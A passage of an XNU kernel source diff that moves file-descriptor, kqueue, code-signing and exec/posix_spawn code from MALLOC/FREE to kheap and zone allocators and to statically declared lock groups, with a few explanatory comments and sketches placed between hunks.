-               for (j = 0; j < nextp->depth; j++) {
-                       nextp->stack[j] = cred_debug_buf_p->stack_buffer[i].stack[j];
-               }
-               space += sizeof(*nextp);
-               nextp++;
-       }
-       req->oldlen = space;
-       error = SYSCTL_OUT(req, bt_bufp, req->oldlen);
-       FREE(bt_bufp, M_TEMP);
-       return error;
-}
-
-#endif  /* DEBUG_CRED */
-
-
 /*
  **********************************************************************
  * The following routines will be moved to a policy_posix.c module at
index c3cc2afa82f30f57d9e2b79b71a5e10d00fb454a..5da291b6a1310f99a7650def588f00273902be10 100644 (file)
@@ -134,8 +134,6 @@ SECURITY_READ_ONLY_LATE(int) cs_library_val_enable = DEFAULT_CS_LIBRARY_VA_ENABL
 #endif /* !SECURE_KERNEL */
 int cs_all_vnodes = 0;
 
-static lck_grp_t *cs_lockgrp;
-
 SYSCTL_INT(_vm, OID_AUTO, cs_force_kill, CTLFLAG_RW | CTLFLAG_LOCKED, &cs_force_kill, 0, "");
 SYSCTL_INT(_vm, OID_AUTO, cs_force_hard, CTLFLAG_RW | CTLFLAG_LOCKED, &cs_force_hard, 0, "");
 SYSCTL_INT(_vm, OID_AUTO, cs_debug, CTLFLAG_RW | CTLFLAG_LOCKED, &cs_debug, 0, "");
@@ -195,10 +193,6 @@ cs_init(void)
            sizeof(cs_library_val_enable));
 #endif
 #endif /* !SECURE_KERNEL */
-
-       lck_grp_attr_t *attr = lck_grp_attr_alloc_init();
-       cs_lockgrp = lck_grp_alloc_init("KERNCS", attr);
-       lck_grp_attr_free(attr);
 }
 STARTUP(CODESIGNING, STARTUP_RANK_FIRST, cs_init);
 
@@ -474,7 +468,7 @@ csblob_get_size(struct cs_blob *blob)
 vm_address_t
 csblob_get_addr(struct cs_blob *blob)
 {
-       return blob->csb_mem_kaddr;
+       return (vm_address_t)blob->csb_mem_kaddr;
 }
 
 /*
@@ -1553,7 +1547,7 @@ cs_blob_get(proc_t p, void **out_start, size_t *out_length)
                return 0;
        }
 
-       *out_start = (void *)csblob->csb_mem_kaddr;
+       *out_start = csblob->csb_mem_kaddr;
        *out_length = csblob->csb_mem_size;
 
        return 0;
index 8e7f964f6bbfd6bc4c258b54a03980fdeceea799..8952d0220f16fa32da57d169b7f48e76201b36cb 100644 (file)
 #include <os/atomic_private.h>
 #include <IOKit/IOBSD.h>
 
-#define IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND 0x1
+#define IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND 0x1
 kern_return_t ipc_object_copyin(ipc_space_t, mach_port_name_t,
     mach_msg_type_name_t, ipc_port_t *, mach_port_context_t, mach_msg_guard_flags_t *, uint32_t);
 void ipc_port_release_send(ipc_port_t);
@@ -145,8 +145,6 @@ int unlink1(vfs_context_t, vnode_t, user_addr_t, enum uio_seg, int);
 
 static void fdrelse(struct proc * p, int fd);
 
-extern void file_lock_init(void);
-
 extern kauth_scope_t    kauth_scope_fileop;
 
 /* Conflict wait queue for when selects collide (opaque type) */
@@ -181,6 +179,11 @@ ZONE_DECLARE(fp_zone, "fileproc",
     sizeof(struct fileproc), ZC_NOENCRYPT | ZC_ZFREE_CLEARMEM);
 ZONE_DECLARE(fdp_zone, "filedesc",
     sizeof(struct filedesc), ZC_NOENCRYPT | ZC_ZFREE_CLEARMEM);
+/*
+ * If you need accounting for KM_OFILETABL consider using
+ * KALLOC_HEAP_DEFINE to define a view.
+ */
+#define KM_OFILETABL KHEAP_DEFAULT
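
The comment above points at KALLOC_HEAP_DEFINE for per-subsystem accounting, while the commit itself keeps KM_OFILETABL as a plain alias for KHEAP_DEFAULT. A hedged sketch of what such a view could look like, assuming the macro takes a heap symbol, a label string, and a heap id as at other xnu call sites; the names below are hypothetical:

    /*
     * Hypothetical accounting view, not part of this commit; assumes the
     * (heap, label, heap id) form of KALLOC_HEAP_DEFINE.
     */
    KALLOC_HEAP_DEFINE(KHEAP_OFILETABL, "open file tables", KHEAP_ID_DEFAULT);
    #define KM_OFILETABL KHEAP_OFILETABL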
 
 /*
  * Descriptor management.
@@ -192,9 +195,7 @@ int nfiles;                     /* actual number of open files */
 static const struct fileops uninitops;
 
 os_refgrp_decl(, f_refgrp, "files refcounts", NULL);
-lck_grp_attr_t * file_lck_grp_attr;
-lck_grp_t * file_lck_grp;
-lck_attr_t * file_lck_attr;
+static LCK_GRP_DECLARE(file_lck_grp, "file");
 
 #pragma mark fileglobs
 
@@ -217,7 +218,7 @@ fg_free(struct fileglob *fg)
        if (IS_VALID_CRED(fg->fg_cred)) {
                kauth_cred_unref(&fg->fg_cred);
        }
-       lck_mtx_destroy(&fg->fg_lock, file_lck_grp);
+       lck_mtx_destroy(&fg->fg_lock, &file_lck_grp);
 
 #if CONFIG_MACF
        mac_file_label_destroy(fg);
@@ -396,30 +397,6 @@ check_file_seek_range(struct flock *fl, off_t cur_file_offset)
 }
 
 
-/*
- * file_lock_init
- *
- * Description:        Initialize the file lock group and the uipc and flist locks
- *
- * Parameters: (void)
- *
- * Returns:    void
- *
- * Notes:      Called at system startup from bsd_init().
- */
-void
-file_lock_init(void)
-{
-       /* allocate file lock group attribute and group */
-       file_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       file_lck_grp = lck_grp_alloc_init("file", file_lck_grp_attr);
-
-       /* Allocate file lock attribute */
-       file_lck_attr = lck_attr_alloc_init();
-}
-
-
 void
 proc_dirs_lock_shared(proc_t p)
 {
@@ -1934,11 +1911,8 @@ sys_fcntl_nocancel(proc_t p, struct fcntl_nocancel_args *uap, int32_t *retval)
                proc_fdunlock(p);
 
                pathlen = MAXPATHLEN;
-               MALLOC(pathbufp, char *, pathlen, M_TEMP, M_WAITOK);
-               if (pathbufp == NULL) {
-                       error = ENOMEM;
-                       goto outdrop;
-               }
+               pathbufp = zalloc(ZV_NAMEI);
+
                if ((error = vnode_getwithref(vp)) == 0) {
                        if (uap->cmd == F_GETPATH_NOFIRMLINK) {
                                error = vn_getpath_ext(vp, NULL, pathbufp, &pathlen, VN_GETPATH_NO_FIRMLINK);
@@ -1951,7 +1925,7 @@ sys_fcntl_nocancel(proc_t p, struct fcntl_nocancel_args *uap, int32_t *retval)
                                error = copyout((caddr_t)pathbufp, argp, pathlen);
                        }
                }
-               FREE(pathbufp, M_TEMP);
+               zfree(ZV_NAMEI, pathbufp);
                goto outdrop;
        }
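
The F_GETPATH / F_GETPATH_NOFIRMLINK paths above stop carving MAXPATHLEN buffers out of M_TEMP and take them from the ZV_NAMEI zone instead; a plain zalloc(ZV_NAMEI) blocks until it succeeds, so the ENOMEM fallback disappears, while the coredump hunk earlier in this commit uses zalloc_flags(ZV_NAMEI, Z_NOWAIT | Z_ZERO) and keeps its NULL check. A sketch of the blocking variant with a hypothetical helper, example_copy_path():

    #include <sys/param.h>          /* MAXPATHLEN */
    #include <sys/vnode.h>

    /* Hypothetical helper showing the blocking ZV_NAMEI pattern. */
    static int
    example_copy_path(vnode_t vp, user_addr_t uaddr)
    {
        char    *pathbuf = zalloc(ZV_NAMEI);    /* MAXPATHLEN-sized element */
        int     len = MAXPATHLEN;
        int     error;

        error = vn_getpath(vp, pathbuf, &len);
        if (error == 0) {
            error = copyout(pathbuf, uaddr, len);
        }
        zfree(ZV_NAMEI, pathbuf);
        return error;
    }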
 
@@ -2612,9 +2586,12 @@ dropboth:
                        .len = CP_MAX_WRAPPEDKEYSIZE,
                };
 
-               MALLOC(k.key, char *, k.len, M_TEMP, M_WAITOK | M_ZERO);
-
-               error = VNOP_IOCTL(vp, F_TRANSCODEKEY, (caddr_t)&k, 1, &context);
+               k.key = kheap_alloc(KHEAP_TEMP, CP_MAX_WRAPPEDKEYSIZE, Z_WAITOK | Z_ZERO);
+               if (k.key == NULL) {
+                       error = ENOMEM;
+               } else {
+                       error = VNOP_IOCTL(vp, F_TRANSCODEKEY, (caddr_t)&k, 1, &context);
+               }
 
                vnode_put(vp);
 
@@ -2623,7 +2600,7 @@ dropboth:
                        *retval = k.len;
                }
 
-               FREE(k.key, M_TEMP);
+               kheap_free(KHEAP_TEMP, k.key, CP_MAX_WRAPPEDKEYSIZE);
 
                break;
        }
@@ -3019,11 +2996,8 @@ dropboth:
                proc_fdunlock(p);
 
                pathlen = MAXPATHLEN;
-               MALLOC(pathbufp, char *, pathlen, M_TEMP, M_WAITOK);
-               if (pathbufp == NULL) {
-                       error = ENOMEM;
-                       goto outdrop;
-               }
+               pathbufp = zalloc(ZV_NAMEI);
+
                if ((error = vnode_getwithref(vp)) == 0) {
                        int backingstore = 0;
 
@@ -3051,7 +3025,8 @@ dropboth:
                                (void)vnode_put(vp);
                        }
                }
-               FREE(pathbufp, M_TEMP);
+
+               zfree(ZV_NAMEI, pathbufp);
                goto outdrop;
        }
 
@@ -3860,14 +3835,14 @@ fdalloc(proc_t p, int want, int *result)
                        numfiles = (int)lim;
                }
                proc_fdunlock(p);
-               MALLOC(newofiles, struct fileproc **,
-                   numfiles * OFILESIZE, M_OFILETABL, M_WAITOK);
+               newofiles = kheap_alloc(KM_OFILETABL, numfiles * OFILESIZE,
+                   Z_WAITOK);
                proc_fdlock(p);
                if (newofiles == NULL) {
                        return ENOMEM;
                }
                if (fdp->fd_nfiles >= numfiles) {
-                       FREE(newofiles, M_OFILETABL);
+                       kheap_free(KM_OFILETABL, newofiles, numfiles * OFILESIZE);
                        continue;
                }
                newofileflags = (char *) &newofiles[numfiles];
@@ -3890,7 +3865,7 @@ fdalloc(proc_t p, int want, int *result)
                fdp->fd_ofiles = newofiles;
                fdp->fd_ofileflags = newofileflags;
                fdp->fd_nfiles = numfiles;
-               FREE(ofiles, M_OFILETABL);
+               kheap_free(KM_OFILETABL, ofiles, oldnfiles * OFILESIZE);
                fdexpand++;
        }
 }
@@ -4602,7 +4577,7 @@ falloc_withalloc(proc_t p, struct fileproc **resultfp, int *resultfd,
                return ENOMEM;
        }
        fg = zalloc_flags(fg_zone, Z_WAITOK | Z_ZERO);
-       lck_mtx_init(&fg->fg_lock, file_lck_grp, file_lck_attr);
+       lck_mtx_init(&fg->fg_lock, &file_lck_grp, LCK_ATTR_NULL);
 
        os_ref_retain_locked(&fp->fp_iocount);
        os_ref_init_raw(&fg->fg_count, &f_refgrp);
@@ -4880,8 +4855,8 @@ fdcopy(proc_t p, vnode_t uth_cdir)
        }
        proc_fdunlock(p);
 
-       MALLOC(newfdp->fd_ofiles, struct fileproc **,
-           i * OFILESIZE, M_OFILETABL, M_WAITOK);
+       newfdp->fd_ofiles = kheap_alloc(KM_OFILETABL, i * OFILESIZE,
+           Z_WAITOK | Z_ZERO);
        if (newfdp->fd_ofiles == NULL) {
                if (newfdp->fd_cdir) {
                        vnode_rele(newfdp->fd_cdir);
@@ -4893,7 +4868,6 @@ fdcopy(proc_t p, vnode_t uth_cdir)
                zfree(fdp_zone, newfdp);
                return NULL;
        }
-       (void) memset(newfdp->fd_ofiles, 0, i * OFILESIZE);
        proc_fdlock(p);
 
        newfdp->fd_ofileflags = (char *) &newfdp->fd_ofiles[i];
@@ -4960,8 +4934,8 @@ fdcopy(proc_t p, vnode_t uth_cdir)
        newfdp->fd_kqhash = NULL;
        newfdp->fd_kqhashmask = 0;
        newfdp->fd_wqkqueue = NULL;
-       lck_mtx_init(&newfdp->fd_kqhashlock, proc_kqhashlock_grp, proc_lck_attr);
-       lck_mtx_init(&newfdp->fd_knhashlock, proc_knhashlock_grp, proc_lck_attr);
+       lck_mtx_init(&newfdp->fd_kqhashlock, &proc_kqhashlock_grp, &proc_lck_attr);
+       lck_mtx_init(&newfdp->fd_knhashlock, &proc_knhashlock_grp, &proc_lck_attr);
 
        return newfdp;
 }
@@ -5027,7 +5001,7 @@ fdfree(proc_t p)
                                proc_fdlock(p);
                        }
                }
-               FREE(fdp->fd_ofiles, M_OFILETABL);
+               kheap_free(KM_OFILETABL, fdp->fd_ofiles, fdp->fd_nfiles * OFILESIZE);
                fdp->fd_ofiles = NULL;
                fdp->fd_nfiles = 0;
        }
@@ -5060,8 +5034,8 @@ fdfree(proc_t p)
                hashdestroy(fdp->fd_kqhash, M_KQUEUE, fdp->fd_kqhashmask);
        }
 
-       lck_mtx_destroy(&fdp->fd_kqhashlock, proc_kqhashlock_grp);
-       lck_mtx_destroy(&fdp->fd_knhashlock, proc_knhashlock_grp);
+       lck_mtx_destroy(&fdp->fd_kqhashlock, &proc_kqhashlock_grp);
+       lck_mtx_destroy(&fdp->fd_knhashlock, &proc_knhashlock_grp);
 
        zfree(fdp_zone, fdp);
 }
@@ -5434,7 +5408,7 @@ sys_fileport_makefd(proc_t p, struct fileport_makefd_args *uap, int32_t *retval)
        int err;
 
        res = ipc_object_copyin(get_task_ipcspace(p->task),
-           send, MACH_MSG_TYPE_COPY_SEND, &port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND);
+           send, MACH_MSG_TYPE_COPY_SEND, &port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND);
 
        if (res == KERN_SUCCESS) {
                err = fileport_makefd(p, port, UF_EXCLOSE, retval);
index 0593bcb08be13b0b6462edbfa863f16ca7cadf2f..f3277df7572e96503a261b5d5decb582b4d36ce9 100644 (file)
@@ -132,7 +132,11 @@ extern int cansignal(struct proc *, kauth_cred_t, struct proc *, int); /* bsd/ke
 
 #define KEV_EVTID(code) BSDDBG_CODE(DBG_BSD_KEVENT, (code))
 
-MALLOC_DEFINE(M_KQUEUE, "kqueue", "memory for kqueue system");
+/*
+ * If you need accounting for KM_KQUEUE consider using
+ * KALLOC_HEAP_DEFINE to define a zone view.
+ */
+#define KM_KQUEUE       KHEAP_DEFAULT
 
 #define KQ_EVENT        NO_EVENT64
 
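KM_KQUEUE above is a straight alias for KHEAP_DEFAULT, so unlike the old MALLOC/FREE(M_KQUEUE) calls, every free must name the same heap and the original allocation size (the knlist hunks below track it as fd_knlistsize). A small sketch of that pairing, with illustrative names:

    /* Illustrative only: grow a pointer table with kheap_alloc/kheap_free. */
    static int
    example_grow_knlist(struct klist **listp, size_t oldcnt, size_t newcnt)
    {
            struct klist *new_list;

            new_list = kheap_alloc(KM_KQUEUE, newcnt * sizeof(struct klist *),
                Z_WAITOK | Z_ZERO);
            if (new_list == NULL) {
                    return ENOMEM;
            }
            if (*listp != NULL) {
                    memcpy(new_list, *listp, oldcnt * sizeof(struct klist *));
                    /* the size handed to kheap_free() must match the allocation */
                    kheap_free(KM_KQUEUE, *listp, oldcnt * sizeof(struct klist *));
            }
            *listp = new_list;
            return 0;
    }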
@@ -3474,8 +3478,8 @@ knotes_dealloc(proc_t p)
                        }
                }
                /* free the table */
-               FREE(fdp->fd_knlist, M_KQUEUE);
-               fdp->fd_knlist = NULL;
+               kheap_free(KM_KQUEUE, fdp->fd_knlist,
+                   fdp->fd_knlistsize * sizeof(struct klist *));
        }
        fdp->fd_knlistsize = 0;
 
@@ -6366,8 +6370,8 @@ kq_add_knote(struct kqueue *kq, struct knote *kn, struct knote_lock_ctx *knlc,
                                goto out_locked;
                        }
 
-                       MALLOC(list, struct klist *,
-                           size * sizeof(struct klist *), M_KQUEUE, M_WAITOK);
+                       list = kheap_alloc(KM_KQUEUE, size * sizeof(struct klist *),
+                           Z_WAITOK);
                        if (list == NULL) {
                                ret = ENOMEM;
                                goto out_locked;
@@ -6378,7 +6382,8 @@ kq_add_knote(struct kqueue *kq, struct knote *kn, struct knote_lock_ctx *knlc,
                        bzero((caddr_t)list +
                            fdp->fd_knlistsize * sizeof(struct klist *),
                            (size - fdp->fd_knlistsize) * sizeof(struct klist *));
-                       FREE(fdp->fd_knlist, M_KQUEUE);
+                       kheap_free(KM_KQUEUE, fdp->fd_knlist,
+                           fdp->fd_knlistsize * sizeof(struct klist *));
                        fdp->fd_knlist = list;
                        fdp->fd_knlistsize = size;
                }
@@ -8551,7 +8556,7 @@ kevt_pcblist SYSCTL_HANDLER_ARGS
            ROUNDUP64(sizeof(struct xsockstat_n));
        struct kern_event_pcb  *ev_pcb;
 
-       buf = _MALLOC(item_size, M_TEMP, M_WAITOK | M_ZERO);
+       buf = kheap_alloc(KHEAP_TEMP, item_size, Z_WAITOK | Z_ZERO);
        if (buf == NULL) {
                return ENOMEM;
        }
@@ -8643,10 +8648,7 @@ kevt_pcblist SYSCTL_HANDLER_ARGS
 done:
        lck_rw_done(&kev_rwlock);
 
-       if (buf != NULL) {
-               FREE(buf, M_TEMP);
-       }
-
+       kheap_free(KHEAP_TEMP, buf, item_size);
        return error;
 }
 
@@ -8982,10 +8984,7 @@ pid_kqueue_extinfo(proc_t p, struct kqueue *kq, user_addr_t ubuf,
        err = copyout(kqext, ubuf, sizeof(struct kevent_extinfo) * MIN(buflen, nknotes));
 
 out:
-       if (kqext) {
-               kheap_free(KHEAP_TEMP, kqext, buflen * sizeof(struct kevent_extinfo));
-               kqext = NULL;
-       }
+       kheap_free(KHEAP_TEMP, kqext, buflen * sizeof(struct kevent_extinfo));
 
        if (!err) {
                *retval = (int32_t)MIN(nknotes, PROC_PIDFDKQUEUE_KNOTES_MAX);
index e8a1e25e037127ac3381e9ae9eb6e32983b9fa96..7eef9034fd13d0058124319c105392e24d700f36 100644 (file)
@@ -253,7 +253,7 @@ task_t convert_port_to_task(ipc_port_t port);
 /*
  * Mach things for which prototypes are unavailable from Mach headers
  */
-#define IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND 0x1
+#define IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND 0x1
 void            ipc_task_reset(
        task_t          task);
 void            ipc_thread_reset(
@@ -1192,7 +1192,9 @@ grade:
        vm_map_set_user_wire_limit(map, (vm_size_t)proc_limitgetcur(p, RLIMIT_MEMLOCK, FALSE));
 #if XNU_TARGET_OS_OSX
        if (p->p_platform == PLATFORM_IOS) {
-               vm_map_mark_alien(map);
+               assert(vm_map_is_alien(map));
+       } else {
+               assert(!vm_map_is_alien(map));
        }
 #endif /* XNU_TARGET_OS_OSX */
        proc_unlock(p);
@@ -1359,6 +1361,14 @@ grade:
        int cputype = cpu_type();
        vm_map_exec(map, task, load_result.is_64bit_addr, (void *)p->p_fd->fd_rdir, cputype, cpu_subtype, reslide);
 
+#if XNU_TARGET_OS_OSX
+#define SINGLE_JIT_ENTITLEMENT "com.apple.security.cs.single-jit"
+
+       if (IOTaskHasEntitlement(task, SINGLE_JIT_ENTITLEMENT)) {
+               vm_map_single_jit(map);
+       }
+#endif /* XNU_TARGET_OS_OSX */
+
        /*
         * Close file descriptors which specify close-on-exec.
         */
@@ -1780,7 +1790,7 @@ exec_activate_image(struct image_params *imgp)
        /* Use excpath, which contains the copyin-ed exec path */
        DTRACE_PROC1(exec, uintptr_t, excpath);
 
-       MALLOC(ndp, struct nameidata *, sizeof(*ndp), M_TEMP, M_WAITOK | M_ZERO);
+       ndp = kheap_alloc(KHEAP_TEMP, sizeof(*ndp), Z_WAITOK | Z_ZERO);
        if (ndp == NULL) {
                error = ENOMEM;
                goto bad_notrans;
@@ -1927,9 +1937,7 @@ bad_notrans:
        if (imgp->ip_ndp) {
                nameidone(imgp->ip_ndp);
        }
-       if (ndp) {
-               FREE(ndp, M_TEMP);
-       }
+       kheap_free(KHEAP_TEMP, ndp, sizeof(*ndp));
 
        return error;
 }
@@ -2184,7 +2192,7 @@ exec_handle_port_actions(struct image_params *imgp,
                if (MACH_PORT_VALID(act->new_port)) {
                        kr = ipc_object_copyin(get_task_ipcspace(current_task()),
                            act->new_port, MACH_MSG_TYPE_COPY_SEND,
-                           (ipc_object_t *) &port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND);
+                           (ipc_object_t *) &port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND);
 
                        if (kr != KERN_SUCCESS) {
                                ret = EINVAL;
@@ -2329,7 +2337,8 @@ exec_handle_file_actions(struct image_params *imgp, short psa_flags)
                        int mode = psfa->psfaa_openargs.psfao_mode;
                        int origfd;
 
-                       MALLOC(bufp, char *, sizeof(*vap) + sizeof(*ndp), M_TEMP, M_WAITOK | M_ZERO);
+                       bufp = kheap_alloc(KHEAP_TEMP,
+                           sizeof(*vap) + sizeof(*ndp), Z_WAITOK | Z_ZERO);
                        if (bufp == NULL) {
                                error = ENOMEM;
                                break;
@@ -2356,7 +2365,7 @@ exec_handle_file_actions(struct image_params *imgp, short psa_flags)
                            fileproc_alloc_init, NULL,
                            &origfd);
 
-                       FREE(bufp, M_TEMP);
+                       kheap_free(KHEAP_TEMP, bufp, sizeof(*vap) + sizeof(*ndp));
 
                        AUDIT_SUBCALL_EXIT(uthread, error);
 
@@ -2411,7 +2420,7 @@ exec_handle_file_actions(struct image_params *imgp, short psa_flags)
 
                        kr = ipc_object_copyin(get_task_ipcspace(current_task()),
                            psfa->psfaa_fileport, MACH_MSG_TYPE_COPY_SEND,
-                           (ipc_object_t *) &port, 0, NULL, IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND);
+                           (ipc_object_t *) &port, 0, NULL, IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND);
 
                        if (kr != KERN_SUCCESS) {
                                error = EINVAL;
@@ -2606,13 +2615,27 @@ exec_spawnattr_getmacpolicyinfo(const void *macextensions, const char *policynam
        return NULL;
 }
 
+static void
+spawn_free_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args,
+    _posix_spawn_mac_policy_extensions_t psmx, int count)
+{
+       if (psmx == NULL) {
+               return;
+       }
+       for (int i = 0; i < count; i++) {
+               _ps_mac_policy_extension_t *ext = &psmx->psmx_extensions[i];
+               kheap_free(KHEAP_TEMP, ext->datap, (vm_size_t) ext->datalen);
+       }
+       kheap_free(KHEAP_TEMP, psmx, px_args->mac_extensions_size);
+}
+
 static int
-spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _posix_spawn_mac_policy_extensions_t *psmxp)
+spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args,
+    _posix_spawn_mac_policy_extensions_t *psmxp)
 {
        _posix_spawn_mac_policy_extensions_t psmx = NULL;
        int error = 0;
        int copycnt = 0;
-       int i = 0;
 
        *psmxp = NULL;
 
@@ -2622,8 +2645,14 @@ spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _p
                goto bad;
        }
 
-       MALLOC(psmx, _posix_spawn_mac_policy_extensions_t, px_args->mac_extensions_size, M_TEMP, M_WAITOK);
-       if ((error = copyin(px_args->mac_extensions, psmx, px_args->mac_extensions_size)) != 0) {
+       psmx = kheap_alloc(KHEAP_TEMP, px_args->mac_extensions_size, Z_WAITOK);
+       if (psmx == NULL) {
+               error = ENOMEM;
+               goto bad;
+       }
+
+       error = copyin(px_args->mac_extensions, psmx, px_args->mac_extensions_size);
+       if (error) {
                goto bad;
        }
 
@@ -2633,7 +2662,7 @@ spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _p
                goto bad;
        }
 
-       for (i = 0; i < psmx->psmx_count; i++) {
+       for (int i = 0; i < psmx->psmx_count; i++) {
                _ps_mac_policy_extension_t *extension = &psmx->psmx_extensions[i];
                if (extension->datalen == 0 || extension->datalen > PAGE_SIZE) {
                        error = EINVAL;
@@ -2650,9 +2679,15 @@ spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _p
                        goto bad;
                }
 #endif
-               MALLOC(data, void *, (size_t)extension->datalen, M_TEMP, M_WAITOK);
-               if ((error = copyin((user_addr_t)extension->data, data, (size_t)extension->datalen)) != 0) {
-                       FREE(data, M_TEMP);
+               data = kheap_alloc(KHEAP_TEMP, (vm_size_t) extension->datalen, Z_WAITOK);
+               if (data == NULL) {
+                       error = ENOMEM;
+                       goto bad;
+               }
+               error = copyin((user_addr_t)extension->data, data, (size_t)extension->datalen);
+               if (error) {
+                       kheap_free(KHEAP_TEMP, data, (vm_size_t) extension->datalen);
+                       error = ENOMEM;
                        goto bad;
                }
                extension->datap = data;
@@ -2662,28 +2697,9 @@ spawn_copyin_macpolicyinfo(const struct user__posix_spawn_args_desc *px_args, _p
        return 0;
 
 bad:
-       if (psmx != NULL) {
-               for (i = 0; i < copycnt; i++) {
-                       FREE(psmx->psmx_extensions[i].datap, M_TEMP);
-               }
-               FREE(psmx, M_TEMP);
-       }
+       spawn_free_macpolicyinfo(px_args, psmx, copycnt);
        return error;
 }
-
-static void
-spawn_free_macpolicyinfo(_posix_spawn_mac_policy_extensions_t psmx)
-{
-       int i;
-
-       if (psmx == NULL) {
-               return;
-       }
-       for (i = 0; i < psmx->psmx_count; i++) {
-               FREE(psmx->psmx_extensions[i].datap, M_TEMP);
-       }
-       FREE(psmx, M_TEMP);
-}
 #endif /* CONFIG_MACF */
 
 #if CONFIG_COALITIONS
@@ -3064,7 +3080,8 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval)
         * Allocate a big chunk for locals instead of using stack since these
         * structures are pretty big.
         */
-       MALLOC(bufp, char *, (sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap)), M_TEMP, M_WAITOK | M_ZERO);
+       bufp = kheap_alloc(KHEAP_TEMP,
+           sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap), Z_WAITOK | Z_ZERO);
        imgp = (struct image_params *) bufp;
        if (bufp == NULL) {
                error = ENOMEM;
@@ -3148,7 +3165,9 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval)
                                error = EINVAL;
                                goto bad;
                        }
-                       MALLOC(px_sfap, _posix_spawn_file_actions_t, px_args.file_actions_size, M_TEMP, M_WAITOK);
+
+                       px_sfap = kheap_alloc(KHEAP_TEMP,
+                           px_args.file_actions_size, Z_WAITOK);
                        if (px_sfap == NULL) {
                                error = ENOMEM;
                                goto bad;
@@ -3175,8 +3194,8 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval)
                                goto bad;
                        }
 
-                       MALLOC(px_spap, _posix_spawn_port_actions_t,
-                           px_args.port_actions_size, M_TEMP, M_WAITOK);
+                       px_spap = kheap_alloc(KHEAP_TEMP,
+                           px_args.port_actions_size, Z_WAITOK);
                        if (px_spap == NULL) {
                                error = ENOMEM;
                                goto bad;
@@ -3204,7 +3223,8 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval)
                                goto bad;
                        }
 
-                       MALLOC(px_persona, struct _posix_spawn_persona_info *, px_args.persona_info_size, M_TEMP, M_WAITOK | M_ZERO);
+                       px_persona = kheap_alloc(KHEAP_TEMP,
+                           px_args.persona_info_size, Z_WAITOK);
                        if (px_persona == NULL) {
                                error = ENOMEM;
                                goto bad;
@@ -3233,8 +3253,8 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval)
                                goto bad;
                        }
 
-                       MALLOC(px_pcred_info, struct _posix_spawn_posix_cred_info *,
-                           px_args.posix_cred_info_size, M_TEMP, M_WAITOK | M_ZERO);
+                       px_pcred_info = kheap_alloc(KHEAP_TEMP,
+                           px_args.posix_cred_info_size, Z_WAITOK);
                        if (px_pcred_info == NULL) {
                                error = ENOMEM;
                                goto bad;
@@ -3270,7 +3290,7 @@ posix_spawn(proc_t ap, struct posix_spawn_args *uap, int32_t *retval)
                                 * ...AND the parent has the entitlement, copy
                                 * the subsystem root path in.
                                 */
-                               MALLOC(subsystem_root_path, char *, px_args.subsystem_root_path_size, M_SBUF, M_WAITOK | M_ZERO | M_NULL);
+                               subsystem_root_path = zalloc_flags(ZV_NAMEI, Z_WAITOK | Z_ZERO);
 
                                if (subsystem_root_path == NULL) {
                                        error = ENOMEM;
@@ -4088,27 +4108,25 @@ bad:
                if (imgp->ip_strings) {
                        execargs_free(imgp);
                }
-               if (imgp->ip_px_sfa != NULL) {
-                       FREE(imgp->ip_px_sfa, M_TEMP);
-               }
-               if (imgp->ip_px_spa != NULL) {
-                       FREE(imgp->ip_px_spa, M_TEMP);
-               }
+               kheap_free(KHEAP_TEMP, imgp->ip_px_sfa,
+                   px_args.file_actions_size);
+               kheap_free(KHEAP_TEMP, imgp->ip_px_spa,
+                   px_args.port_actions_size);
 #if CONFIG_PERSONAS
-               if (imgp->ip_px_persona != NULL) {
-                       FREE(imgp->ip_px_persona, M_TEMP);
-               }
+               kheap_free(KHEAP_TEMP, imgp->ip_px_persona,
+                   px_args.persona_info_size);
 #endif
-               if (imgp->ip_px_pcred_info != NULL) {
-                       FREE(imgp->ip_px_pcred_info, M_TEMP);
-               }
+               kheap_free(KHEAP_TEMP, imgp->ip_px_pcred_info,
+                   px_args.posix_cred_info_size);
 
                if (subsystem_root_path != NULL) {
-                       FREE(subsystem_root_path, M_SBUF);
+                       zfree(ZV_NAMEI, subsystem_root_path);
                }
 #if CONFIG_MACF
-               if (imgp->ip_px_smpx != NULL) {
-                       spawn_free_macpolicyinfo(imgp->ip_px_smpx);
+               _posix_spawn_mac_policy_extensions_t psmx = imgp->ip_px_smpx;
+               if (psmx) {
+                       spawn_free_macpolicyinfo(&px_args,
+                           psmx, psmx->psmx_count);
                }
                if (imgp->ip_execlabelp) {
                        mac_cred_label_free(imgp->ip_execlabelp);
@@ -4263,9 +4281,8 @@ bad:
                proc_rele(p);
        }
 
-       if (bufp != NULL) {
-               FREE(bufp, M_TEMP);
-       }
+       kheap_free(KHEAP_TEMP, bufp,
+           sizeof(*imgp) + sizeof(*vap) + sizeof(*origvap));
 
        if (inherit != NULL) {
                ipc_importance_release(inherit);
@@ -4506,7 +4523,8 @@ __mac_execve(proc_t p, struct __mac_execve_args *uap, int32_t *retval)
        /* Allocate a big chunk for locals instead of using stack since these
         * structures are pretty big.
         */
